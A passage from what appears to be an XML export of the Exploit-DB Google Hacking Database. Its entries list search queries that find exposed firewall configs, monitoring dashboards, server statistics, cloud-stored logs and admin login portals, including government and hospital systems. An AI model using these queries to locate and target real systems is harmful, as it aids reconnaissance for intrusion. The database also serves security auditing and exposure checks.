<query>inurl:department intext:&quot;hardware inventory&quot; firewall router ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw )</query>
<querystring>https://www.google.com/search?q=inurl:department intext:&quot;hardware inventory&quot; firewall router ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw )</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>3811</id>
<link>https://www.exploit-db.com/ghdb/3811</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:finger.cgi</shortDescription>
<textualDescription>Finger
Submitted by: Christy Philip Mathew</textualDescription>
<query>inurl:finger.cgi</query>
<querystring>https://www.google.com/search?q=inurl:finger.cgi</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4326</id>
<link>https://www.exploit-db.com/ghdb/4326</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:ipf.conf -intext:ipf.conf ext:conf</shortDescription>
<textualDescription>IP Filter is software that provides packet filtering capabilities on a
Solaris system. On a properly setup system, it can be used to build a
firewall. ipf.conf is the firewall configuration file which can be exposed
to view the ip filter rules set up on the device.
Ayushman Dutta
University of Houston</textualDescription>
<query>inurl:ipf.conf -intext:ipf.conf ext:conf</query>
<querystring>https://www.google.com/search?q=inurl:ipf.conf -intext:ipf.conf ext:conf</querystring>
<edb></edb>
<date>2016-09-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1158</id>
<link>https://www.exploit-db.com/ghdb/1158</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:login.jsp.bak</shortDescription>
<textualDescription>JSP programmer anyone? You can read this!</textualDescription>
<query>inurl:login.jsp.bak</query>
<querystring>https://www.google.com/search?q=inurl:login.jsp.bak</querystring>
<edb></edb>
<date>2005-09-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>5093</id>
<link>https://www.exploit-db.com/ghdb/5093</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:nagios/cgi-bin/status.cgi</shortDescription>
<textualDescription>Exploit Title: Nagios monitor data
Google dork: inurl:nagios/cgi-bin/status.cgi
Date:2/8/2019
Exploit author: techjohnny
</textualDescription>
<query>inurl:nagios/cgi-bin/status.cgi</query>
<querystring>https://www.google.com/search?q=inurl:nagios/cgi-bin/status.cgi</querystring>
<edb></edb>
<date>2019-02-11</date>
<author>Johnny Tech</author>
</entry>
<entry>
<id>1232</id>
<link>https://www.exploit-db.com/ghdb/1232</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:ovcgi/jovw</shortDescription>
<textualDescription>An HP Java network management tool. It is a sign that a network may not be configured properly.</textualDescription>
<query>inurl:ovcgi/jovw</query>
<querystring>https://www.google.com/search?q=inurl%3Aovcgi%2Fjovw</querystring>
<edb></edb>
<date>2005-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>160</id>
<link>https://www.exploit-db.com/ghdb/160</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:phpSysInfo/ &quot;created by phpsysinfo&quot;</shortDescription>
<textualDescription>This statistics program allows the an admin to view stats about a webserver. Some sites leave this in a publically accessible web page. Hackers could have access to data such as the real IP address of the server, server memory usage, general system info such as OS, type of chip, hard-drive makers and much more.</textualDescription>
<query>inurl:phpSysInfo/ &quot;created by phpsysinfo&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3AphpSysInfo%2F+%22created+by+phpsysinfo%22</querystring>
<edb></edb>
<date>2004-04-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>664</id>
<link>https://www.exploit-db.com/ghdb/664</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:portscan.php &quot;from Port&quot;|&quot;Port Range&quot;</shortDescription>
<textualDescription>This is general search for online port scanners which accept any IP. It does not find a specific scanner script, but searches for a pattern which will match some more scanners.</textualDescription>
<query>inurl:portscan.php &quot;from Port&quot;|&quot;Port Range&quot;</query>
<querystring>https://www.google.com/search?q=inurl:portscan.php+%22from+Port%22%7C%22Port+Range%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;rls=org.mozilla:en-US:official&amp;filter=0</querystring>
<edb></edb>
<date>2004-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1227</id>
<link>https://www.exploit-db.com/ghdb/1227</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl</shortDescription>
<textualDescription>Information about proxy servers, internal ip addresses and other network sensitive stuff.</textualDescription>
<query>inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl</query>
<querystring>https://www.google.com/search?q=inurl%3Aproxy+%7C+inurl%3Awpad+ext%3Apac+%7C+ext%3Adat+findproxyforurl</querystring>
<edb></edb>
<date>2005-12-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>606</id>
<link>https://www.exploit-db.com/ghdb/606</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:statrep.nsf -gov</shortDescription>
<textualDescription>Domino is server technology which transforms Lotus NotesÂî into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds statistics pages generated by Domino. Information on these pages includes Operating System, Disk space, Usernames and full path disclosure.Example: * 1. Statistics Reports - 1. System * 1. Statistics Reports - 2. Mail &amp; Database * 1. Statistics Reports - 3. Communications * 1. Statistics Reports - 4. Network * 1. Statistics Reports - 5. Clusters * 1. Statistics Reports - 6. Web Server &amp; Retriever * 1. Statistics Reports - 7. Calendaring Scheduling * 2. Alarms * 3. Events * 4. Spreadsheet Export * 5. Graphs - 1. System Statistics * 5. Graphs - 2. System Loads * 5. Graphs - 3. System Resources * 6. Trouble Tickets - 1. Alarm * 6. Trouble Tickets - 2. Event * 7. Analysis Report * 8. File Statistics * 9. Single Copy Object Store Statistics</textualDescription>
<query>inurl:statrep.nsf -gov</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=inurl%3Astatrep.nsf+-gov</querystring>
<edb></edb>
<date>2004-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>1162</id>
<link>https://www.exploit-db.com/ghdb/1162</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:status.cgi?host=all</shortDescription>
<textualDescription>Nagios Status page. See what ports are being monitored as well as ip addresses.Be sure to check the google cached page first.</textualDescription>
<query>inurl:status.cgi?host=all</query>
<querystring>https://www.google.com/search?num=30&amp;q=inurl%3Astatus.cgi%3Fhost%3Dall+-cvs</querystring>
<edb></edb>
<date>2005-10-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>717</id>
<link>https://www.exploit-db.com/ghdb/717</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:testcgi xitami</shortDescription>
<textualDescription>Testpage / webserver environmentThis is the test cgi for xitami webserver. It shows the webserver's complete environment. Contains very interesting information which can be used a first step into the server.</textualDescription>
<query>inurl:testcgi xitami</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3Atestcgi+xitami</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1201</id>
<link>https://www.exploit-db.com/ghdb/1201</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin</shortDescription>
<textualDescription>***WARNING: This search uses google images, disable images unless you want your IP spewed across webpages!***Webalizer is a program that organizes who is going to a Webpage, what they are looking at, what user names are entered and endless other statistics.This is a great first step in getting too much information about a website. You see any links or files that are hidden, the search can be made more specific by using other google advanced searchs.Learn more about Webalizer(http://www.mrunix.net/webalizer/).</textualDescription>
<query>inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin</query>
<querystring>https://www.google.com/search?safe=off&amp;c2coff=1&amp;filter=0&amp;q=inurl:webalizer+-.gov+-.edu+-.mil+-opendarwin&amp;tbm=isch&amp;tbs=ift:png</querystring>
<edb></edb>
<date>2005-11-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>657</id>
<link>https://www.exploit-db.com/ghdb/657</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:webutil.pl</shortDescription>
<textualDescription>webutil.pl is a web interface to the following services:* ping* traceroute* whois* finger* nslookup* host* dnsquery* dig* calendar* uptime</textualDescription>
<query>inurl:webutil.pl</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3Awebutil.pl</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4568</id>
<link>https://www.exploit-db.com/ghdb/4568</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:zabbix.php AND intext:&quot;Zabbix SIA&quot;</shortDescription>
<textualDescription>Dork for ZABBIX Network Monitoring System (version 3.2.x)
--
@verovan</textualDescription>
<query>inurl:zabbix.php AND intext:&quot;Zabbix SIA&quot;</query>
<querystring>https://www.google.com/search?q=inurl:zabbix.php AND intext:&quot;Zabbix SIA&quot;</querystring>
<edb></edb>
<date>2017-08-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>5467</id>
<link>https://www.exploit-db.com/ghdb/5467</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:zabbix/zabbix.php</shortDescription>
<textualDescription>Zabbix monitoring dashboard
# Google Dork:
inurl:zabbix/zabbix.php
inurl:zabbix/hosts.php
# Date: [28-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>inurl:zabbix/zabbix.php</query>
<querystring>https://www.google.com/search?q=inurl:zabbix/zabbix.php</querystring>
<edb></edb>
<date>2019-08-28</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>293</id>
<link>https://www.exploit-db.com/ghdb/293</link>
<category>Network or Vulnerability Data</category>
<shortDescription>Looking Glass</shortDescription>
<textualDescription>A Looking Glass is a CGI script for viewing results of simple queries executed on remote routers. There are many Looking Glass sites all over the world. Some are password protected, many are not.An attacker use this to gather information about the network.</textualDescription>
<query>&quot;Looking Glass&quot; (inurl:&quot;lg/&quot; | inurl:lookingglass)</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Looking+Glass%22+%28inurl%3A%22lg%2F%22+%7C+inurl%3Alookingglass%29+</querystring>
<edb></edb>
<date>2004-06-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>5307</id>
<link>https://www.exploit-db.com/ghdb/5307</link>
<category>Network or Vulnerability Data</category>
<shortDescription>s3 site:amazonaws.com intext:dhcp filetype:txt inurl:apollo</shortDescription>
<textualDescription>Find DHCP and router logs stored on AWS s3 bucket
# Google Dork: s3 site:amazonaws.com intext:dhcp filetype:txt inurl:apollo
# Date: [30-7-2019]
# Dork Author: [Mohammed*_*]
Endless OS logs
Google Dork: s3 site:amazonaws.com intext:dhcp filetype:txt inurl:endlessos</textualDescription>
<query>s3 site:amazonaws.com intext:dhcp filetype:txt inurl:apollo</query>
<querystring>https://www.google.com/search?q=s3 site:amazonaws.com intext:dhcp filetype:txt inurl:apollo</querystring>
<edb></edb>
<date>2019-07-31</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>3799</id>
<link>https://www.exploit-db.com/ghdb/3799</link>
<category>Network or Vulnerability Data</category>
<shortDescription>site*.*.*/webalizer intitle:&quot;Usage Statistics&quot;</shortDescription>
<textualDescription>Shows usage statistics of sites. Includes monthy reports on the IP addresses, user agents, and more, of the viewers of the sites, the most active first.</textualDescription>
<query>site*.*.*/webalizer intitle:&quot;Usage Statistics&quot;</query>
<querystring>https://www.google.com/search?q=site*.*.*/webalizer intitle:&quot;Usage Statistics&quot;</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>490</id>
<link>https://www.exploit-db.com/ghdb/490</link>
<category>Network or Vulnerability Data</category>
<shortDescription>site:netcraft.com intitle:That.Site.Running Apache</shortDescription>
<textualDescription>Netcraft reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site. So, Netcraft scans Web servers, Google scans Netcraft, and the hacker scans Google.This search is easily modified (replace &quot;apache&quot; for the other server software), thus adding yet another way to find the webserver software version info.</textualDescription>
<query>site:netcraft.com intitle:That.Site.Running Apache</query>
<querystring>https://www.google.com/search?q=site%3Anetcraft.com+intitle%3AThat.Site.Running+Apache</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7232</id>
<link>https://www.exploit-db.com/ghdb/7232</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot; Stanford CoreNLP &quot; &quot;Visualisation provided using the brat visualisation&quot;</shortDescription>
<textualDescription># Google Dork: &quot; Stanford CoreNLP &quot; &quot;Visualisation provided using the brat visualisation&quot;
# Various Online Devices
# Date: 15/09/2021
# Exploit Author: Mugdha Peter Bansode</textualDescription>
<query>&quot; Stanford CoreNLP &quot; &quot;Visualisation provided using the brat visualisation&quot;</query>
<querystring>https://www.google.com/search?q=&quot; Stanford CoreNLP &quot; &quot;Visualisation provided using the brat visualisation&quot;</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>4863</id>
<link>https://www.exploit-db.com/ghdb/4863</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;2004 - 2018 iboss, Inc. All rights reserved.&quot;</shortDescription>
<textualDescription>Find iBoss login portals.
~ CrimsonTorso
</textualDescription>
<query>&quot;2004 - 2018 iboss, Inc. All rights reserved.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;2004 - 2018 iboss, Inc. All rights reserved.&quot;</querystring>
<edb></edb>
<date>2018-06-21</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>6385</id>
<link>https://www.exploit-db.com/ghdb/6385</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;big-ip logout page&quot; ext:php3</shortDescription>
<textualDescription>Dork: &quot;big-ip logout page&quot; ext:php3</textualDescription>
<query>&quot;big-ip logout page&quot; ext:php3</query>
<querystring>https://www.google.com/search?q=&quot;big-ip logout page&quot; ext:php3</querystring>
<edb></edb>
<date>2020-07-09</date>
<author>datahex</author>
</entry>
<entry>
<id>1237</id>
<link>https://www.exploit-db.com/ghdb/1237</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;bp blog admin&quot; intitle:login | intitle:admin -site:johnny.ihackstuff.com</shortDescription>
<textualDescription>betaparticle (bp) blog is blog software coded in asp. This google dork finds the admin logins.</textualDescription>
<query>&quot;bp blog admin&quot; intitle:login | intitle:admin -site:johnny.ihackstuff.com</query>
<querystring>https://www.google.com/search?q=%22bp+blog+admin%22+intitle:login+%7C+intitle:admin+-site:johnny.ihackstuff.com&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2006-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4873</id>
<link>https://www.exploit-db.com/ghdb/4873</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;CCCLogin.aspx&quot;</shortDescription>
<textualDescription>Find direct login pages using ProPortal.
~ CrimsonTorso
</textualDescription>
<query>&quot;CCCLogin.aspx&quot;</query>
<querystring>https://www.google.com/search?q=&quot;CCCLogin.aspx&quot;</querystring>
<edb></edb>
<date>2018-06-25</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>6495</id>
<link>https://www.exploit-db.com/ghdb/6495</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Citrix Receiver&quot; inurl:index.html &quot;Gateway&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Citrix Receiver&quot; inurl:index.html &quot;Gateway&quot;
# Citrix Gateway login portals.
# Date: 26/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Citrix Receiver&quot; inurl:index.html &quot;Gateway&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Citrix Receiver&quot; inurl:index.html &quot;Gateway&quot;</querystring>
<edb></edb>
<date>2020-08-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7436</id>
<link>https://www.exploit-db.com/ghdb/7436</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;com.sap.itsam.problems.java.systeminfo&quot;</shortDescription>
<textualDescription># Google Dork: &quot;com.sap.itsam.problems.java.systeminfo&quot;
# Pages Containing Login Portals
# Date:13/10/2021
# Exploit Author: GnosticPlayers</textualDescription>
<query>&quot;com.sap.itsam.problems.java.systeminfo&quot;</query>
<querystring>https://www.google.com/search?q=&quot;com.sap.itsam.problems.java.systeminfo&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>GnosticPlayers</author>
</entry>
<entry>
<id>4886</id>
<link>https://www.exploit-db.com/ghdb/4886</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Copyright Metislab&quot; password</shortDescription>
<textualDescription>Metislab login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;Copyright Metislab&quot; password</query>
<querystring>https://www.google.com/search?q=&quot;Copyright Metislab&quot; password</querystring>
<edb></edb>
<date>2018-07-06</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4732</id>
<link>https://www.exploit-db.com/ghdb/4732</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;department&quot; | &quot;agency&quot; | &quot;government&quot; &quot;intitle:&quot;login form&quot; -youtube -template</shortDescription>
<textualDescription>Governments, agencies and politic related login portals.
Bruno Schmid
</textualDescription>
<query>&quot;department&quot; | &quot;agency&quot; | &quot;government&quot; &quot;intitle:&quot;login form&quot; -youtube -template</query>
<querystring>https://www.google.com/search?q=&quot;department&quot; | &quot;agency&quot; | &quot;government&quot; &quot;intitle:&quot;login form&quot; -youtube -template</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7170</id>
<link>https://www.exploit-db.com/ghdb/7170</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Desktop&quot; &quot;Simple&quot; &quot;Responsive&quot; intitle:&quot;Controllr&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Desktop&quot; &quot;Simple&quot; &quot;Responsive&quot; intitle:&quot;Controllr&quot;
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>&quot;Desktop&quot; &quot;Simple&quot; &quot;Responsive&quot; intitle:&quot;Controllr&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Desktop&quot; &quot;Simple&quot; &quot;Responsive&quot; intitle:&quot;Controllr&quot;</querystring>
<edb></edb>
<date>2021-09-08</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1229</id>
<link>https://www.exploit-db.com/ghdb/1229</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Emergisoft web applications are a part of our&quot;</shortDescription>
<textualDescription>Hospital patient management system, in theory it could be dangerous.</textualDescription>
<query>&quot;Emergisoft web applications are a part of our&quot;</query>
<querystring>https://www.google.com/search?q=%22Emergisoft+web+applications+are+a+part+of+our%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>1193</id>
<link>https://www.exploit-db.com/ghdb/1193</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Establishing a secure Integrated Lights Out session with&quot; OR intitle:&quot;Data Frame - Browser not HTTP 1.1 compatible&quot; OR intitle:&quot;HP Integrated Lights-</shortDescription>
<textualDescription>iLo and related login pages !? Whoops..</textualDescription>
<query>&quot;Establishing a secure Integrated Lights Out session with&quot; OR intitle:&quot;Data Frame - Browser not HTTP 1.1 compatible&quot; OR intitle:&quot;HP Integrated Lights-</query>
<querystring>https://www.google.com/search?q=%22Establishing+a+secure+Integrated+Lights+Out+session+with%22+OR+intitle:%22Data+Frame+-+Browser+not+HTTP+1.1+compatible%22+OR+intitle:%22HP+Integrated+Lights-Out+Login%22+%7C+%22Alert%27+panel+is+displayed,+you+must+selec</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5055</id>
<link>https://www.exploit-db.com/ghdb/5055</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Example: jane.citizen1&quot;</shortDescription>
<textualDescription>&quot;Example: jane.citizen1&quot;
Login portals
~ B15mu7h</textualDescription>
<query>&quot;Example: jane.citizen1&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Example: jane.citizen1&quot;</querystring>
<edb></edb>
<date>2018-12-14</date>
<author>Steph Jensen</author>
</entry>
<entry>
<id>7471</id>
<link>https://www.exploit-db.com/ghdb/7471</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;fluig&quot; &quot;login&quot;</shortDescription>
<textualDescription># Google Dork: &quot;fluig&quot; &quot;login&quot;
# Pages Containing Login Portals
# Date: 20/10/2021
# Exploit Author: Dennis Silva
</textualDescription>
<query>&quot;fluig&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q==?UTF-8?Q?=E2=80=8B&quot;fluig&quot;_&quot;login&quot;?=</querystring>
<edb></edb>
<date>2021-10-21</date>
<author>Dennis Silva</author>
</entry>
<entry>
<id>7037</id>
<link>https://www.exploit-db.com/ghdb/7037</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;FM Monitoring Receiver&quot; intitle:&quot;login&quot; &quot;welcome!&quot;</shortDescription>
<textualDescription># Google Dork: &quot;FM Monitoring Receiver&quot; intitle:&quot;login&quot; &quot;welcome!&quot;
# Category: Pages Containing Login Portals
# Date: 05/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>&quot;FM Monitoring Receiver&quot; intitle:&quot;login&quot; &quot;welcome!&quot;</query>
<querystring>https://www.google.com/search?q=&quot;FM Monitoring Receiver&quot; intitle:&quot;login&quot; &quot;welcome!&quot;</querystring>
<edb></edb>
<date>2021-07-22</date>
<author>s Thakur</author>
</entry>
<entry>
<id>1070</id>
<link>https://www.exploit-db.com/ghdb/1070</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;HostingAccelerator&quot; intitle:&quot;login&quot; +&quot;Username&quot; -&quot;news&quot; -demo</shortDescription>
<textualDescription>This will find the login portal for HostingAccelerator ControlPanel I have not looked for exploits for these so i dont know if their are any. So far i have seen versions 1.9 2.2 and 2.4 found by this dork.</textualDescription>
<query>&quot;HostingAccelerator&quot; intitle:&quot;login&quot; +&quot;Username&quot; -&quot;news&quot; -demo</query>
<querystring>https://www.google.com/search?q=%22HostingAccelerator%22+intitle:%22login%22+%2B%22Username%22+-%22news%22+-demo&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>1186</id>
<link>https://www.exploit-db.com/ghdb/1186</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;iCONECT 4.1 :: Login&quot;</shortDescription>
<textualDescription>This search finds the login page for iCONECTnxt, it enables firms to search, organize, and review electronic and document discovery information — including email, native files, and images — from anywhere in the world for easy collaboration with outside counsel, branch offices, and consultants. LAN and Web solutions available.</textualDescription>
<query>&quot;iCONECT 4.1 :: Login&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22iCONECT+4.1+%3A%3A+Login%22</querystring>
<edb></edb>
<date>2005-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>588</id>
<link>https://www.exploit-db.com/ghdb/588</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;IMail Server Web Messaging&quot; intitle:login</shortDescription>
<textualDescription>IMail Server from Ipswitch is a messaging solution with 60 million users worldwide. It contains the features and safeguards you need without the complexity of expensive solutions like Microsoft ExchangeÂî or groupware which challenges even the most experienced administrators.This is a login portal search. Security Focus shows a list of vulnerabilities about this software.</textualDescription>
<query>&quot;IMail Server Web Messaging&quot; intitle:login</query>
<querystring>https://www.google.com/search?q=%22IMail+Server+Web+Messaging%22+intitle:login&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6065</id>
<link>https://www.exploit-db.com/ghdb/6065</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;index of&quot; &quot;adminer.php&quot;</shortDescription>
<textualDescription>Dork: &quot;index of&quot; &quot;adminer.php&quot;
Description: This Google dork can be used to discover servers with
adminer.php files which can be accessed to try and log in to the database.
Author: Jinson Varghese Behanan (@JinsonCyberSec)
Author Homepage: https://www.jinsonvarghese.com
</textualDescription>
<query>&quot;index of&quot; &quot;adminer.php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;adminer.php&quot;</querystring>
<edb></edb>
<date>2020-05-08</date>
<author>Jinson Varghese Behanan</author>
</entry>
<entry>
<id>1068</id>
<link>https://www.exploit-db.com/ghdb/1068</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;inspanel&quot; intitle:&quot;login&quot; -&quot;cannot&quot; &quot;Login ID&quot; -site:inspediumsoft.com</shortDescription>
<textualDescription>This finds all versions of the inspanel login page.</textualDescription>
<query>&quot;inspanel&quot; intitle:&quot;login&quot; -&quot;cannot&quot; &quot;Login ID&quot; -site:inspediumsoft.com</query>
<querystring>https://www.google.com/search?q=%22inspanel%22+intitle:%22login%22+-%22cannot%22+%22Login+ID%22+-site:inspediumsoft.com&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1246</id>
<link>https://www.exploit-db.com/ghdb/1246</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;intitle:3300 Integrated Communications Platform&quot; inurl:main.htm</shortDescription>
<textualDescription>logon portal to the mitel 330 integrated communications platform.[MitelÂî 3300 Integrated Communications Platform (ICP) provides enterprises with a highly scalable, feature-rich communications system designed to support businesses from 30-60,000 users. ...supporting networking standards such as Q.SIG, DPNSS, and MSDN .... enable their legacy PBX's, ]</textualDescription>
<query>&quot;intitle:3300 Integrated Communications Platform&quot; inurl:main.htm</query>
<querystring>https://www.google.com/search?q=%22intitle%3A3300+Integrated+Communications+Platform%22+inurl%3Amain.htm&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2006-01-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>5040</id>
<link>https://www.exploit-db.com/ghdb/5040</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;inurl:&quot;Umbraco/#/login&quot; site:*edu&quot;</shortDescription>
<textualDescription>Find login portals for .edu websites using Umbraco web software.
Find login portals for .gov websites using Umbraco web software.
&quot;inurl:&quot;Umbraco/#/login&quot; site:*gov&quot;
~ CrimsonTorso</textualDescription>
<query>&quot;inurl:&quot;Umbraco/#/login&quot; site:*edu&quot;</query>
<querystring>https://www.google.com/search?q=&quot;inurl:&quot;Umbraco/#/login&quot; site:*edu&quot;</querystring>
<edb></edb>
<date>2018-11-28</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>3911</id>
<link>https://www.exploit-db.com/ghdb/3911</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;inurl:/data/nanoadmin.php&quot;</shortDescription>
<textualDescription>Hi,
I would like to submit this GHDB which allow to find out nanoCMS
administration pages :
*inurl:&quot;/data/nanoadmin.php&quot;*
Best regards,
Antonino Napoli</textualDescription>
<query>&quot;inurl:/data/nanoadmin.php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;inurl:/data/nanoadmin.php&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4419</id>
<link>https://www.exploit-db.com/ghdb/4419</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Joomla! Administration Login&quot; inurl:&quot;/index.php&quot;</shortDescription>
<textualDescription>Finds Joomla admin login pages
Dxtroyer</textualDescription>
<query>&quot;Joomla! Administration Login&quot; inurl:&quot;/index.php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Joomla! Administration Login&quot; inurl:&quot;/index.php&quot;</querystring>
<edb></edb>
<date>2017-04-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4490</id>
<link>https://www.exploit-db.com/ghdb/4490</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Log in&quot; &quot;Magento is a trademark of Magento Inc.&quot;</shortDescription>
<textualDescription>Finds Magento admin logins
Dxtroyer</textualDescription>
<query>&quot;Log in&quot; &quot;Magento is a trademark of Magento Inc.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Log in&quot; &quot;Magento is a trademark of Magento Inc.&quot;</querystring>
<edb></edb>
<date>2017-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>600</id>
<link>https://www.exploit-db.com/ghdb/600</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Login - Sun Cobalt RaQ&quot;</shortDescription>
<textualDescription>The famous Sun linux appliance. Nice clean portal search.Various vulnerabilities are reported to security focus.</textualDescription>
<query>&quot;Login - Sun Cobalt RaQ&quot;</query>
<querystring>https://www.google.com/search?q=%22Login+-+Sun+Cobalt+RaQ%22</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>3718</id>
<link>https://www.exploit-db.com/ghdb/3718</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Login Name&quot; Repository Webtop intitle:login</shortDescription>
<textualDescription>Search for login screen of default instance: Documentum Webtop by EMC</textualDescription>
<query>&quot;Login Name&quot; Repository Webtop intitle:login</query>
<querystring>https://www.google.com/search?q=&quot;Login Name&quot; Repository Webtop intitle:login</querystring>
<edb></edb>
<date>2011-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>1109</id>
